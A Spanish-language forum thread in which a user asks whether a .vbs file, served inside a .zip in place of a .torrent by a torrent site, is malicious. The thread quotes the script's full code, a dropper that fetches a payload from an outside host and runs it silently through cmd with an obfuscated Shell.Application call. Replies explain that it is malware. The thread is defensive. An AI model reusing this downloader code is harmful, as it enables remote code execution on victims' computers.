✅

¿Archivo .vbs dentro de un .torrent es malicioso?

Ketere 23 marzo 2020 21:27 ✎

⋮

En la web mejortorrentt.net intento bajar el archivo .torrent que viene dentro de un .zip y el antivirus de Windows me salta diciendo que tiene virus.

Desactivo el antivirus, me descarga el .zip y dentro hay un archivo .vbs (debería ser .torrent como ha sido siempre). Me pasa en varias webs.

Abro el archivo con un editor de texto y sale este código:

Set ypencj4 = CreateObject("WinHttp.WinHttpRequest.5.1")
ypencj3 = Wscript.ScriptName
ypencj4.open "POST", "http://www.mejortorrentt.org/img/ab/ypencj", False
ypencj4.send
CreateObject("Shell.Application").Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.Application.ShellExecute "cmd",ypencj4.responseText & ypencj3,ypencj,"",0

¿Es malicioso de verdad?

Duda resuelta en ✅ ⚠️ Es malicioso. Los archivos .vbs son pequeños programas…

BocaDePez 23 marzo 2020 22:33

⋮

Date por infectado, por norma general esos virus lo que te instalan en un minador de criptomonedas, seguramente que ya estas minando, lo notarás porque el equipo te va lento y los ventiladores van a full.

Al ejecutar el administrador de tareas para ver que servicio está tirando más de la CPU se desactiva para que no averigües donde está el problema. Te recomiendo que salves tus datos y formatees el equipo, ya que quitar este malware te va costar sudor y lagrimas.

✖

BocaDePez 23 marzo 2020 22:40

⋮

Ha dicho que no lo ha ejecutado… Si sólo ha mirado el código, no hay riesgo

BocaDePez 23 marzo 2020 23:19

⋮

Si ten cuidado que es un virus, de hecho descubrí que tiene truco si miras o pones la pagina en modo móvil te descarga el torrent normal en vez del virus vbs

marcelg 23 marzo 2020 23:26

⋮

En torrent todo lo que no sea .torrent o el magnet es mala cosa=virus o similar!

He probado una descara desde esa web desde el firefox en w10 y me salido bien, nada de zip, fichero torrent en ese caso.

✖

BocaDePez 23 marzo 2020 23:41

⋮

Lo que dice el compi, los archivos torrent no van comprimidos. Ese zip tiene un caramelito chupao ;).

Ossian 24 marzo 2020 01:20

⋮

grantorrent.li usando hola vpn como extensión o cualquier vpn que gustes, tambien tienes dontorrent.org sin vpn ni nada

Spyd 24 marzo 2020 08:58 ✎

⋮

⚠️ Es malicioso.

Los archivos .vbs son pequeños programas escritos en Visual Basic Script que ejecutan comandos del sistema. Ese código en concreto lo que hace es una petición POST la URL http://www.mejortorrentt.org/img/ab/ypencj para descargar un archivo, y luego abre una línea de comandos y ejecuta el archivo descargado:

El código que ves en la imagen parece que descarga varios archivos para sustituir los originales de Windows, así que se puede decir que es malicioso.

BocaDePez 24 marzo 2020 11:23

⋮

Ponte una extension en el navegador que se llama agent switcher, le marcas que se identifique como sistema macos o linux y caso cerrado, los torrent descsrgaran bien.

✖

Ketere 25 marzo 2020 13:49

⋮

acabo de probarlo. he elegido IOS, y se ha descargado el .torrent

mil gracias! no conocia esa extension

BocaDePez 24 marzo 2020 12:38

⋮

Desde hace tiempo no se puede descargar de mejortorrent porque pasa eso…

✖

Ketere 25 marzo 2020 13:47

⋮

entonces el problema está en esa web en concreto? tienen los archivos infectados?

BocaDePez 25 marzo 2020 21:32

⋮

Debes usar www.dontorrent.org

Es lo mismo que mejortorrent pero sin el virus.

Ketere 25 marzo 2020 21:42

⋮

desde otro SO se descarga el .torrent sin problemas

✖

BocaDePez 25 marzo 2020 22:53

⋮

Pues nada compi, sigue usando con triquiñuelas una web que intenta meterte virus al menor despiste.

En vez de usar una alternativa limpia.